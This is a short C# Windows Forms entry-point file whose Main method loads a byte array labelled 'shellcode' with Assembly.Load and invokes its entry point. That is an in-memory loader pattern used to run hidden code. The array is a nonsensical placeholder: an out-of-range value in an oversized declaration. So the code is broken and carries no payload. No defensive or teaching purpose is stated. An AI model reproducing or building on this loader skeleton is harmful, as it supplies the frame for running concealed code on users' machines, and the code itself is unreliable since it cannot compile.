using System; using System.Collections.Generic; using System.Linq; using System.Threading.Tasks; using System.Windows.Forms; using System.Reflection; namespace WindowsFormsApp { static class Program { /// /// The main entry point for the application. /// [STAThread] static void Main() { byte[] shellcode = new byte[654321] { 123456 }; Assembly.Load(shellcode).EntryPoint.Invoke(null, null); } } }